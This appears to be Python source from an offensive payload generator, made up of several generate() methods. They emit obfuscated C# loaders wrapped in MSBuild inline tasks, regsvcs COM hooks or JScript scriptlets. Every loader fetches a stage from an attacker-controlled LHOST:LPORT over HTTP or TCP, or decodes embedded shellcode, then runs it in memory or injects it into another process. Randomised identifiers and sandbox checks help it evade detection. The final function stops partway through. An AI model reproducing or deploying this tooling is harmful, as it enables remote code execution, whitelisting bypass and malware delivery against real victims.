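def generate(self):
    """Emit an MSBuild project whose inline C# task fetches a stage over HTTP and runs it.

    The XML wraps a ``CodeTaskFactory`` class.  When ``msbuild.exe`` loads the
    project the task requests ``http://LHOST:LPORT/<uri>`` -- ``<uri>`` is a
    random path whose 8-bit checksum is 92, the marker Metasploit's
    reverse_http handler uses to recognise a Windows stager request -- treats
    the response body as raw shellcode and executes it inside the msbuild
    process using ``INJECT_METHOD`` ("virtual" or "heap").  Every identifier
    in the generated C# is randomised.

    Reads:   self.required_options["INJECT_METHOD" | "LHOST" | "LPORT"][0]
    Writes:  self.payload_source_code (the complete project file as a str)
    Raises:  ValueError if INJECT_METHOD is neither "virtual" nor "heap".
             Previously an unsupported value silently produced C# with no
             injector function, which only failed later at compile time.
    """
    inject_method = self.required_options["INJECT_METHOD"][0].lower()
    if inject_method not in ("virtual", "heap"):
        raise ValueError(
            "INJECT_METHOD must be 'virtual' or 'heap', got %r"
            % (self.required_options["INJECT_METHOD"][0],))

    # MSBuild specific variables
    targetName = bypass_helpers.randomString()
    className = bypass_helpers.randomString()
    # Random parameter names for the P/Invoke declarations
    # (12 for the VirtualAlloc path, 17 for the HeapCreate path).
    r = [bypass_helpers.randomString() for _ in range(12)]
    y = [bypass_helpers.randomString() for _ in range(17)]

    # The header for MSBuild XML files.  Backslashes are doubled so the
    # literal does not depend on Python preserving invalid escapes like "\W".
    # TODO: Fix the awful formatting
    msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className)

    # imports and class header for the inline task
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
    payload_code += "public class %s : Task, ITask {\n" % (className)

    # P/Invoke declarations for whichever injection primitive was chosen.
    if inject_method == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
            r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    else:  # "heap"
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
            y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    # C# helper randomString(Random r, int s): s characters drawn from a
    # per-build shuffled alphanumeric alphabet.
    randomStringName = bypass_helpers.randomString()
    bufferName = bypass_helpers.randomString()
    charsName = bypass_helpers.randomString()
    t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
    random.shuffle(t)
    chars = ''.join(t)
    payload_code += "static string %s(Random r, int s) {\n" % (randomStringName)
    payload_code += "char[] %s = new char[s];\n" % (bufferName)
    payload_code += "string %s = \"%s\";\n" % (charsName, chars)
    payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
        bufferName, charsName, charsName)
    payload_code += "return new string(%s);}\n" % (bufferName)

    # C# helper checksum8(string): true when the byte sum of the string mod 256
    # is 92 (URI_CHECKSUM_INITW, the reverse_http Windows-stager marker).
    checksum8Name = bypass_helpers.randomString()
    payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
        checksum8Name)

    # C# helper genHTTPChecksum(Random r): up to 64 attempts of a random
    # 3-char prefix plus one trailing char from a re-shuffled alphabet until
    # checksum8() matches; "9vXU" (which also sums to 92) is the fallback.
    genHTTPChecksumName = bypass_helpers.randomString()
    baseStringName = bypass_helpers.randomString()
    randCharsName = bypass_helpers.randomString()
    urlName = bypass_helpers.randomString()
    random.shuffle(t)
    randChars = ''.join(t)
    payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
        genHTTPChecksumName, baseStringName)
    payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
        baseStringName, randomStringName)
    payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
        randCharsName, randChars)
    payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (randCharsName)
    payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName)
    payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
        checksum8Name, urlName, urlName)

    # C# helper getData(string url): GET the stage with a fixed IE-style
    # User-Agent.  Bodies shorter than 100000 bytes are discarded as not
    # being a stage, and any WebException yields null so inject() is a no-op.
    # NOTE(review): the UA/Accept headers are static and therefore easy to
    # signature on; they are kept as-is to stay compatible with the handler.
    getDataName = bypass_helpers.randomString()
    strName = bypass_helpers.randomString()
    webClientName = bypass_helpers.randomString()
    sName = bypass_helpers.randomString()
    payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName)
    payload_code += "WebClient %s = new System.Net.WebClient();\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
        webClientName)
    payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
        webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
        webClientName)
    payload_code += "byte[] %s = null;\n" % (sName)
    payload_code += "try { %s = %s.DownloadData(%s);\n" % (sName, webClientName, strName)
    payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
    payload_code += "catch (WebException) {}\n"
    payload_code += "return %s;}\n" % (sName)

    # C# helper inject(byte[] s): copy the stage into executable memory and
    # run it on a new thread, blocking forever (0xFFFFFFFF == INFINITE).
    injectName = bypass_helpers.randomString()
    sName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    if inject_method == "virtual":
        # VirtualAlloc(MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40): a
        # writable+executable region.  NOTE(review): allocating RW and
        # flipping to PAGE_EXECUTE_READ after the copy would avoid RWX memory.
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
            funcAddrName, sName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
            sName, funcAddrName, sName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
            hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    else:  # "heap"
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) then
        # HeapAlloc(HEAP_ZERO_MEMORY=0x00000008): a private executable heap.
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
            pinfoName, sName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
            funcAddrName, pinfoName, sName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
            funcAddrName, sName, sName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
            hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)

    # Task body: sandbox-check prologue from gamemaker (which reports how many
    # braces it left open), then download + inject.
    sName = bypass_helpers.randomString()
    randomName = bypass_helpers.randomString()
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 2  # + the class brace and the Execute() brace
    payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (randomName)
    payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
        sName, getDataName, self.required_options["LHOST"][0],
        self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
    payload_code += "%s(%s);\n" % (injectName, sName)

    # Close every open brace; Execute() must return true so MSBuild reports
    # the target as succeeded.
    while num_tabs_required != 0:
        if num_tabs_required == 2:
            payload_code += "\nreturn true;"
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1

    payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
    self.payload_source_code = msbuild_header + payload_code
    return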
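def generate(self):
    """Emit C# for a ServicedComponent assembly that runs embedded shellcode on (un)registration.

    The source is meant to be compiled and loaded with ``regsvcs.exe`` /
    ``regasm.exe``: the ``[ComRegisterFunction]`` and ``[ComUnregisterFunction]``
    hooks both call the same static method, so the payload fires for normal
    registration and for ``/U`` alike.  Shellcode is embedded base64-encoded
    and executed in-process via ``INJECT_METHOD``: "virtual" allocates RW,
    copies, then VirtualProtect()s to PAGE_EXECUTE_READ; "heap" uses a
    private executable heap.

    Reads:   self.cli_shellcode, self.shellcode, self.cli_opts,
             self.required_options["INJECT_METHOD"][0]
    Writes:  self.payload_type, self.payload_source_code
    Raises:  ValueError if INJECT_METHOD is neither "virtual" nor "heap"
             (the old code silently emitted C# without any injection code).
    """
    inject_method = self.required_options["INJECT_METHOD"][0].lower()
    if inject_method not in ("virtual", "heap"):
        raise ValueError(
            "INJECT_METHOD must be 'virtual' or 'heap', got %r"
            % (self.required_options["INJECT_METHOD"][0],))

    # Generate the shellcode (or take the one supplied on the CLI)
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        else:
            # assume custom shellcode
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # msfvenom C-style "\x41\x42" -> "0x41,0x42", then base64 so the C# side
    # only has to Convert.FromBase64String() and parse each hex token.
    # NOTE(review): assumes "\xNN" input; any other format produces tokens
    # that Convert.ToByte(tok, 16) will reject at run time.
    Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
    Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

    # Randomised identifiers for the generated C#
    className = bypass_helpers.randomString()
    classNameTwo = bypass_helpers.randomString()
    namespace = bypass_helpers.randomString()
    key = bypass_helpers.randomString()
    execName = bypass_helpers.randomString()
    bytearrayName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    shellcodeName = bypass_helpers.randomString()
    rand_bool = bypass_helpers.randomString()
    random_out = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    # Random parameter names for the P/Invoke declarations
    # (16 for the VirtualAlloc path, 17 for the HeapCreate path).
    r = [bypass_helpers.randomString() for _ in range(16)]
    y = [bypass_helpers.randomString() for _ in range(17)]

    # required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n"
    payload_code += "namespace {0}\n {{".format(namespace)
    payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(className)
    # Placeholder "legitimate" behaviour: the constructor just prints a string
    # (the original comment said message box; it is Console.WriteLine).
    payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(className)
    # Both COM (un)registration hooks hand off to the injector class.
    payload_code += "\n\t\t[ComRegisterFunction]"
    payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(classNameTwo, execName)
    payload_code += "\n[ComUnregisterFunction]"
    payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameTwo, execName)

    payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo)
    if inject_method == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
            r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11], r[12], r[13], r[14], r[15])
    else:  # "heap"
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
            y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    # Injector method: sandbox-check prologue (gamemaker reports how many
    # braces it leaves open), decode the shellcode, then run it.
    payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 3  # + namespace, class and method braces
    indent = '\t' * num_tabs_required
    payload_code += indent + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));\n" % (bytearrayName, Shellcode)
    payload_code += indent + "string[] chars = %s.Split(',').ToArray();\n" % (bytearrayName)
    payload_code += indent + "byte[] %s = new byte[chars.Length];\n" % (shellcodeName)
    payload_code += indent + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % (shellcodeName)

    if inject_method == "virtual":
        # VirtualAlloc(MEM_COMMIT|MEM_RESERVE=0x3000, PAGE_READWRITE=0x04),
        # copy, then VirtualProtect to PAGE_EXECUTE_READ (0x20) over the whole
        # buffer.  The old code passed a fixed 0x1000 here, so any payload
        # larger than one page was only partially made executable and faulted.
        payload_code += indent + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % (funcAddrName, shellcodeName)
        payload_code += indent + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payload_code += indent + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (hThreadName, threadIdName, pinfoName)
        payload_code += indent + "uint %s;\n" % (random_out)
        payload_code += indent + "bool %s = VirtualProtect(%s, (uint)%s.Length, (uint)0x20, out %s);\n" % (rand_bool, funcAddrName, shellcodeName, random_out)
        payload_code += indent + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += indent + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % (hThreadName)
    else:  # "heap"
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) then
        # HeapAlloc(HEAP_ZERO_MEMORY=0x00000008): a private executable heap.
        rand_heap = bypass_helpers.randomString()
        rand_ptr = bypass_helpers.randomString()
        rand_var = bypass_helpers.randomString()
        payload_code += indent + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, shellcodeName)
        payload_code += indent + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, shellcodeName)
        payload_code += indent + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, shellcodeName, shellcodeName)
        payload_code += indent + 'UInt32 {} = 0;\n'.format(rand_var)
        payload_code += indent + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var)
        payload_code += indent + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format(hThreadName)

    # Close every open brace (sandbox checks, method, class, namespace)
    while num_tabs_required != 0:
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1

    self.payload_source_code = payload_code
    return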
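def generate(self):
    """Emit an MSBuild project whose inline C# task pulls a stage over raw TCP and runs it.

    The generated task connects to ``LHOST:LPORT``, reads a 4-byte
    little-endian length followed by that many bytes of stage, prefixes the
    buffer with ``0xBF <socket handle>`` (x86 ``mov edi, imm32``, so the
    stage finds its socket in EDI) and executes it in the msbuild process
    via ``INJECT_METHOD`` ("virtual" or "heap").

    Reads:   self.required_options["INJECT_METHOD" | "LHOST" | "LPORT"][0]
    Writes:  self.payload_source_code (the complete project file as a str)
    Raises:  ValueError if INJECT_METHOD is neither "virtual" nor "heap"
             (previously that silently produced C# with no injector).
    """
    inject_method = self.required_options["INJECT_METHOD"][0].lower()
    if inject_method not in ("virtual", "heap"):
        raise ValueError(
            "INJECT_METHOD must be 'virtual' or 'heap', got %r"
            % (self.required_options["INJECT_METHOD"][0],))

    getDataName = bypass_helpers.randomString()
    injectName = bypass_helpers.randomString()
    targetName = bypass_helpers.randomString()
    className = bypass_helpers.randomString()
    # Random parameter names for the P/Invoke declarations
    # (12 for the VirtualAlloc path, 17 for the HeapCreate path).
    r = [bypass_helpers.randomString() for _ in range(12)]
    y = [bypass_helpers.randomString() for _ in range(17)]

    # The header for MSBuild XML files.  Backslashes are doubled so the
    # literal does not depend on Python preserving invalid escapes like "\W".
    # TODO: Fix the awful formatting
    msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className)

    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
    payload_code += "public class %s : Task, ITask {\n" % (className)

    # P/Invoke declarations for whichever injection primitive was chosen.
    if inject_method == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
            r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    else:  # "heap"
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
            y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    # C# helper getData(string host, int port): the reverse_tcp stager.
    hostName = bypass_helpers.randomString()
    portName = bypass_helpers.randomString()
    ipName = bypass_helpers.randomString()
    sockName = bypass_helpers.randomString()
    length_rawName = bypass_helpers.randomString()
    hdrReadName = bypass_helpers.randomString()
    hdrGotName = bypass_helpers.randomString()
    lengthName = bypass_helpers.randomString()
    sName = bypass_helpers.randomString()
    total_bytesName = bypass_helpers.randomString()
    bodyGotName = bypass_helpers.randomString()
    handleName = bypass_helpers.randomString()
    payload_code += "static byte[] %s(string %s, int %s) {\n" % (getDataName, hostName, portName)
    payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (ipName, hostName, portName)
    payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (sockName)
    payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
    payload_code += " catch { return null;}\n"
    # 4-byte little-endian stage length.  TCP gives no guarantee that one
    # Receive() returns all 4 bytes, so loop until they are in; a return of
    # 0 (peer closed) or less aborts instead of spinning forever.
    payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
    payload_code += " int %s = 0;\n" % (hdrReadName)
    payload_code += " while (%s < 4) { int %s = %s.Receive(%s, %s, 4 - %s, 0); if (%s <= 0) return null; %s += %s; }\n" % (
        hdrReadName, hdrGotName, sockName, length_rawName, hdrReadName, hdrReadName, hdrGotName, hdrReadName, hdrGotName)
    payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (lengthName, length_rawName)
    # A non-positive length would make `new byte[len + 5]` throw; bail out.
    payload_code += " if (%s <= 0) return null;\n" % (lengthName)
    # Stage buffer with 5 bytes of headroom for the `mov edi, <handle>` prefix.
    payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName)
    payload_code += " int %s = 0;\n" % (total_bytesName)
    payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
    payload_code += " { int %s = %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0); if (%s <= 0) return null; %s += %s; }\n" % (
        bodyGotName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName, bodyGotName, total_bytesName, bodyGotName)
    # 0xBF = x86 `mov edi, imm32`; the stage expects its socket handle in EDI.
    payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (handleName, sockName)
    payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (handleName, sName, sName)
    payload_code += " return %s;}\n" % (sName)

    # C# helper inject(byte[] s): copy the stage into executable memory and
    # run it on a new thread, blocking forever (0xFFFFFFFF == INFINITE).
    sName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    if inject_method == "virtual":
        # VirtualAlloc(MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40): RWX.
        # NOTE(review): RW + VirtualProtect to PAGE_EXECUTE_READ after the
        # copy would avoid a writable+executable region.
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, sName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (sName, funcAddrName, sName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    else:  # "heap"
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) then
        # HeapAlloc(HEAP_ZERO_MEMORY=0x00000008): a private executable heap.
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)

    # Task body: sandbox-check prologue from gamemaker (which reports how many
    # braces it leaves open), then connect + inject.
    sName = bypass_helpers.randomString()
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 2  # + the class brace and the Execute() brace
    payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
        sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payload_code += " %s(%s);\n" % (injectName, sName)

    # Close every open brace; Execute() must return true so MSBuild reports
    # the target as succeeded.
    while num_tabs_required != 0:
        if num_tabs_required == 2:
            payload_code += "\nreturn true;"
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1

    payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
    self.payload_source_code = msbuild_header + payload_code
    return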
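def generate(self):
    """Build a scriptlet (JScript or VBScript) that injects shellcode into a new process.

    A C# class ``HelloWorld`` with a ``Print(string)`` method is generated,
    compiled to a 32-bit DLL with ``mcs`` and converted with DotNetToJScript
    (run under wine).  ``Print`` spawns ``C:\\Windows\\System32\\<PROCESS>``
    suspended, writes the shellcode into it (RW, then VirtualProtectEx to
    PAGE_EXECUTE_READ), queues an APC pointing at it on the primary thread
    and resumes the process.  The DotNetToJScript output is wrapped in a
    ``<scriptlet>`` with the base64 shellcode prepended as a script variable.

    Reads:   self.cli_shellcode, self.shellcode, self.cli_opts,
             self.required_options["PROCESS" | "SCRIPT_TYPE"][0]
    Writes:  self.payload_type, self.payload_source_code
    Raises:  ValueError for an unsupported SCRIPT_TYPE (the old code printed a
             message and then died with UnboundLocalError);
             subprocess.CalledProcessError if mcs or DotNetToJScript fails
             (the old code ignored the exit status and failed later on a
             missing output file).

    All intermediate files now live in a private temporary directory instead
    of fixed names under /tmp, where another local user could pre-create or
    swap them between write and read and so inject into the generated
    payload; the tool invocations use argv lists rather than shell strings.
    """
    import subprocess
    import tempfile

    # Generate the shellcode (or take the one supplied on the CLI)
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        else:
            # assume custom shellcode
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # msfvenom C-style "\x41\x42" -> "0x41,0x42", then base64; the C# side
    # decodes and parses each hex token.  NOTE(review): assumes "\xNN" input.
    Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
    Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

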